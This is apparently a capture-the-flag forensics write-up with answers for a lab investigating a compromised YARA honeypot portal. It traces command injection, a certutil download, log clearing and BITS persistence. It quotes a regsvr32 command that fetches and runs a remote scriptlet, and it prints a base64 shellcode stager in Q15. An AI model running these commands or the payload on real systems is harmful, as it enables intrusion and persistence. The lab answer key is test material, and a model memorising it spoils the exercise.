Scenario

Lab Link: YARA Trap

Wowza Enterprise recently deployed a secure malware analysis portal on an isolated workstation, accessible only to internal threat analysts. Promoted as part of a critical infrastructure environment, the portal was secretly configured as a honeypot to detect insider threats. Unexpected behaviors were observed on the system, including rule submissions triggering unexplained command activity and the creation of unfamiliar files. Security teams suspect the portal's functionality was exploited to gain deeper access, potentially enabling the attacker to establish persistence and escalate privileges within the isolated environment.

Your task is to investigate the forensic artifacts provided to uncover how the attacker gained access, what actions they performed, and whether they established any mechanisms to maintain long-term control over the system.

Resources:

• BITS Forensics – GIAC GCIH Paper

Initial Access

Q1

The vulnerability was exploited during the engagement from which IP address?

C:\Users\Administrator\Desktop\Start Here\Tools\CryptnetURLCacheParser>python CryptnetUrlCacheParser.py -d "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Users\yaranware\AppData\LocalLow\Microsoft\CryptnetUrlCache" -o "C:\Users\Administrator\Desktop\Start Here\output\crypturlout.csv"

opening it you will see

http://192.168.189.148/sisisisam.exe

Answer

192.168.189.148

Q2

Review the PHP code responsible for processing YARA rules on the honeypot web portal. Which PHP file contains the vulnerable code that was used to execute system commands?

go to:

C:\Users\Administrator\Desktop\Start Here\Artifacts\C\xampp\htdocs

and check the .php files there

Answer

process_yara.php

Q3

Within the vulnerable PHP file, a specific user-supplied variable is passed directly to the system for command execution, resulting in a command injection vulnerability.

review the code in

process_yara.php

Answer

$arguments

Execution

Q4

Following the execution of the initial whoami command, the attacker issued a second system command to gather information from the compromised honeypot. What is the second command executed by the attacker?

run pecmd.exe on the

C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Windows\prefetch

analyze u will find that whoami was executed at 2025-07-19 07:53:28

follow next commands you will

Answer:

tasklist

Q5

Around 07:58, a system utility was used to retrieve a binary from an external source, which was then executed to gain a foothold on the honeypot. What is the full path of this binary?

In the PECmd output, you will find that certutil was executed. Looking at the MFT around that timestamp, a file was created

Answer:

C:\xampp\htdocs\yara32.exe

Note: I solved this using an unconventional method.

Q6

The binary previously identified was hosted externally and accessed by the attacker during the compromise. What is the full URL used to host this binary?

from our previous identifications

Answer:

http://192.168.189.148/sisisisam.exe

Q7

During the initial exploitation phase, the attacker used a command injection to run whoami.exe. This triggered the creation of a .yar file, which can be identified by correlating its creation time with the execution of this command. What is the name of the .yar file that was created when the whoami command was executed?

in MFT output check .yar files that was created around

 2025-07-19 07:53

Answer

20250719_095326Rule.yar

Privilege Escalation

Q8

The attacker escalated privileges by migrating into a process running as LOCAL SYSTEM. Which Windows privilege enabled this action?

Answer:

SeDebugPrivilege

Defense Evasion

Q9

Before establishing persistence, the attacker disabled and cleared the Windows Event Logs. At what time did this action occur?

in evtx output look for event id no. 104 and look for descreption

Event log cleared

Answer:

2025-07-19 08:20

Persistence

Q10

The attacker created a persistence mechanism that caused the honeypot to execute a remote script. What is the domain name used to host this script?

running

python BitsParser.py -i "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader"

you will get

C:\Users\Administrator\Desktop\Start Here\Tools\BitsParser>python BitsParser.py -i "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader"
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb.chk
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb.log
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb00001.log
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\qmgr.db
{
    "JobType": "download",
    "JobPriority": "normal",
    "JobState": "error",
    "JobId": "779b678b-9ef3-41ea-bc10-d4c7e35520f4",
    "JobName": "MicrosoftEdgeUpdateTaskMachineCore",
    "CommandExecuted": "C:\\Windows\\System32\\cmd.exe",
    "CommandArguments": "/c regsvr32 /s /n /u /i:http://wzdsawsd.xyz/N572Pg.sct scrobj.dll",
    "OwnerSID": "S-1-5-18",
    "Owner": "NT AUTHORITY\\SYSTEM"
}
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Answer:

wzdsawsd.xyz

Q11

The attacker used a signed Windows binary to execute a remote script as part of the persistence mechanism. What is the MITRE ATT&CK Sub-Technique ID associated with this behavior?

Answer:

T1218.010

Q12

The attacker created a persistence job that appears in the system with a name and a unique ID. Can you list the name and the ID assigned to this job?

from our previous output in bitsparser

Answer:

MicrosoftEdgeUpdateTaskMachineCore, 779b678b-9ef3-41ea-bc10-d4c7e35520f4

Command and Control

Q13

Following the creation of the persistence job, the mechanism was configured to re-execute at fixed intervals. Based on process activity observed in the timeline, how many seconds were set between each execution?

examine the task

Answer:

60

Q14

The attacker used a Background Intelligent Transfer Service (BITS) job to maintain persistence on the honeypot. What is the MITRE ATT&CK Technique ID for this persistence method?

Answer:

T1197 

Q15

The PowerShell script executed by the persistence mechanism decodes and injects a shellcode payload into memory. After decoding and decompressing the payload, a SHA256 hash can be calculated. What is the SHA256 hash of the final shellcode?

Answer Format: ****************************************************************

Navigate to the output directory

cd C:\Users\Administrator\Desktop\Start Here\output

View the shellcode event file

type shellcode_event.txt

u'll see a ps event log entry containing obfuscated base64 encoded and gzip compressed shellcode with {0} placeholders and string concatenation operators '+'

now extract the base64 string from the event log

powershell -Command "$content = Get-Content shellcode_event.txt -Raw; $content -match 'H4sIABa5e2gCA7.+?(?=''\))' | Out-Null; $base64 = $matches[0] -replace '\{0\}','w'; $base64.Length; $base64 | Out-File 'base64_full.txt' -NoNewline"

output:

1996

this extracts the base64 string (replacing {0} with w) and saves it to base64_full.txt. The length is 1996 characters.

verify the extracted base64

type base64_full.txt | more

u'll see the base64 string with '+' concatenation operators still present.

clean the base64 string by removing concatenation operators

powershell -Command "$base64 = (Get-Content base64_full.txt -Raw) -replace \"'\+'\",''; $base64 | Out-File 'base64_clean.txt' -NoNewline; Write-Host 'Cleaned base64, length:' $base64.Length"

output:

Cleaned base64, length: 1936

decode and decompress the base64 gzip stream

powershell -Command "$base64 = Get-Content base64_clean.txt -Raw; $decodedBytes = [System.Convert]::FromBase64String($base64); $ms = New-Object System.IO.MemoryStream(,$decodedBytes); $gzip = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Decompress); $sr = New-Object System.IO.StreamReader($gzip); $decompressed = $sr.ReadToEnd(); $sr.Close(); $decompressed | Out-File 'decompressed_shellcode.txt' -Encoding UTF8; Write-Host 'Decompressed successfully, length:' $decompressed.Length"

output:

Decompressed successfully, length: 3115

view the decompressed PowerShell script

type decompressed_shellcode.txt | more

• Function definitions (bm, uHcj)
• A base64-encoded shellcode in variable $oJB
• Code that allocates memory, copies shellcode, and executes it

C:\Users\Administrator\Desktop\Start Here\output>powershell -Command "$shellcodeB64 = '/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSA+3SkpIi3JQTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJIi1Igi0I8QVFIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ESLQCBQi0gYSQHQ41ZNMclI/8lBizSISAHWSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAATGwKi9lEFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//VSAHDSCnGSIX2deFB/+c='; $shellcodeBytes = [System.Convert]::FromBase64String($shellcodeB64); $sha256 = [System.Security.Cryptography.SHA256]::Create(); $hash = $sha256.ComputeHash($shellcodeBytes); $hashString = [System.BitConverter]::ToString($hash) -replace '-',''; Write-Host 'SHA256:' $hashString; $hashString | Out-File 'final_shellcode_hash.txt' -NoNewline"
SHA256: F77CDB7980E5B9883809BA3B4F11CC685C3ED6E70A24B3B3204D5C51D6C0E589

C:\Users\Administrator\Desktop\Start Here\output>

Answer:

F77CDB7980E5B9883809BA3B4F11CC685C3ED6E70A24B3B3204D5C51D6C0E589

Q16

After the script was executed around 08:26, it retrieved another payload from the attacker's C2 server. What is the full URL used to host this payload?

looking at the powershell script that was executed at that time in evtx logs

Answer

http://192.168.189.148/N572Pg

Discovery

Q17

After 08:25, the attacker attempted to discover other hosts within the honeypot network. How many times was this discovery action carried out?

Answer:

3

Lateral Movement

Q18

How many times was the file identified in the previous question executed during the attack?

Answer:

2

Q19

An unusual executable not found on standard Windows systems was observed during the attack and linked to lateral movement. What is the name of this file?

Answer Format: ********.***

cd C:\Users\Administrator\Desktop\Start Here\output

This command searches the prefetch timeline for executables executed between 08:30-08:36 (the lateral movement timeframe).

findstr /i "08:3[0-6]" prefetch_analysis_Timeline.csv

we found REGSVR64.EXE

• REGSVR64.EXE is NOT a standard Windows executable
• Standard Windows has REGSVR32.EXE (for 32-bit) but NOT REGSVR64.EXE
• It appears during the lateral movement timeframe (08:34:46 and 08:35:36)

REGSVR64.EXE

Q20

The executable identified in the previous question was a renamed version of a well-known Sysinternals tool commonly used for lateral movement. What is the original name of this tool?

Answer

PsExec

Containment

Q21

To contain the incident, WhiteLotus changed the honeypot's network mode, disconnecting it from the attacker and terminating active sessions. Based on the DHCP logs, what is the exact timestamp of this containment action?

Answer

2025-07-19 08:36